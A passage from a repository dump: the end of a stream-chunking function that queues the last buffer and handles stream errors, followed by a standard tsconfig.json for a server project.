queue.push({ chunk: buffer, index: count++ }); // Enqueue remaining data as the last chunk 46 | } 47 | processQueue().then(resolve).catch(reject); 48 | }); 49 | 50 | readable.on('error', (err) => { 51 | reject(err); 52 | }); 53 | }); 54 | } 55 | -------------------------------------------------------------------------------- /server/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es2016", 4 | "module": "commonjs", 5 | "esModuleInterop": true, 6 | "outDir": "./dist", 7 | "rootDir": "./src", 8 | "baseUrl": "./", 9 | "skipLibCheck": true, 10 | "moduleResolution": "node", 11 | "resolveJsonModule": true 12 | }, 13 | "include": [ 14 | "src" 15 | ] 16 | } --------------------------------------------------------------------------------